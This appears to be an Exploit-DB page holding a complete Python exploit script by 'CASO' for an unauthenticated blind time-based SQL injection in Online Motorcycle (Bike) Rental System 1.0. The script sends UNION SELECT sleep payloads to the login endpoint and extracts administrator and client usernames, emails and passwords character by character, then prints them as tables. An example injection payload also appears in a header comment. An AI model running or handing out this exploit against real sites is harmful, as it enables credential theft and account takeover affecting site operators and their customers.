b17b7fe4b2
10 changes to exploits/shellcodes Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS) myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS) Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
164 lines
No EOL
6.2 KiB
Python
Executable file
164 lines
No EOL
6.2 KiB
Python
Executable file
# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
|
|
# Exploit Author: Chase Comardelle(CASO)
|
|
# Date: October 18, 2021
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
|
|
# Tested on: Kali Linux, Apache, Mysql
|
|
# Vendor: oretnom23
|
|
# Version: v1.0
|
|
# Exploit Description:
|
|
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials
|
|
|
|
|
|
#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
|
|
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/
|
|
|
|
import requests
|
|
import sys
|
|
import urllib3
|
|
import pyfiglet
|
|
|
|
|
|
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
|
|
|
|
|
|
|
|
def find_clients_usernames(url):
|
|
clients = ""
|
|
cookies = {'Cookie:':'PHPSESSID='}
|
|
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
|
|
path = '/classes/Login.php?f=login_user'
|
|
position = 1
|
|
i=0
|
|
while i <len(chars) :
|
|
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
|
|
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
|
|
|
|
if r.elapsed.total_seconds() > 1:
|
|
clients += chars[i]
|
|
i=0
|
|
position+=1
|
|
else:
|
|
i +=1
|
|
return clients
|
|
|
|
|
|
def find_db_usernames(url):
|
|
users = ""
|
|
cookies = {'Cookie:':'PHPSESSID='}
|
|
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
|
|
path = '/classes/Login.php?f=login_user'
|
|
position = 1
|
|
i=0
|
|
while i <len(chars) :
|
|
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
|
|
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
|
|
|
|
if r.elapsed.total_seconds() > 1:
|
|
users += chars[i]
|
|
i=0
|
|
position+=1
|
|
else:
|
|
i +=1
|
|
return users
|
|
|
|
def find_db_passwords(url):
|
|
passwords = ""
|
|
clientCount = 0
|
|
cookies = {'Cookie:':'PHPSESSID='}
|
|
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
|
|
path = '/classes/Login.php?f=login_user'
|
|
position = 1
|
|
i=0
|
|
|
|
while i <len(chars) :
|
|
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
|
|
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
|
|
|
|
if r.elapsed.total_seconds() > 1:
|
|
passwords += chars[i]
|
|
i=0
|
|
position+=1
|
|
else:
|
|
i +=1
|
|
|
|
return passwords
|
|
|
|
def find_client_passwords(url):
|
|
passwords = ""
|
|
clientCount = 0
|
|
cookies = {'Cookie:':'PHPSESSID='}
|
|
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
|
|
path = '/classes/Login.php?f=login_user'
|
|
position = 1
|
|
i=0
|
|
|
|
while i <len(chars) :
|
|
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
|
|
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
|
|
|
|
if r.elapsed.total_seconds() > 1:
|
|
passwords += chars[i]
|
|
i=0
|
|
position+=1
|
|
else:
|
|
i +=1
|
|
|
|
return passwords
|
|
|
|
|
|
def create_table(users,passwords):
|
|
|
|
|
|
for i in range(0,len(users)):
|
|
print(users[i]," | ",passwords[i])
|
|
|
|
def print_header():
|
|
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
|
|
print("[*] Online Motorcycle (Bike) Rental System [*]")
|
|
print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
|
|
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
|
|
print("\n")
|
|
print(pyfiglet.figlet_format(" CAS0", font = "slant" ))
|
|
|
|
chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
|
|
'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
|
|
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
|
|
'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
|
|
'8','9','@','#',",",'.']
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
url = sys.argv[1].strip()
|
|
except IndexError:
|
|
print("[-] Usage: %s <url>" % sys.argv[0])
|
|
print("[-] Example: %s www.example.com" % sys.argv[0])
|
|
sys.exit(-1)
|
|
|
|
|
|
print_header()
|
|
print("[*] RETRIEVING CREDENTIALS NOW [*]")
|
|
dbUsernames = find_db_usernames(url)
|
|
dbUsernames = dbUsernames.split(",")
|
|
|
|
dbPasswords = find_db_passwords(url)
|
|
dbPasswords = dbPasswords.split(",")
|
|
|
|
print("[*] DATABASE CREDENTIALS [*]")
|
|
create_table(dbUsernames,dbPasswords)
|
|
|
|
clientUsernames = find_clients_usernames(url)
|
|
clientsUsernames = clientUsernames.split(",")
|
|
|
|
clientPasswords = find_client_passwords(url)
|
|
clientPasswords = clientPasswords.split(",")
|
|
|
|
print("[*] CLIENT CREDENTIALS [*]")
|
|
create_table(clientsUsernames,clientPasswords) |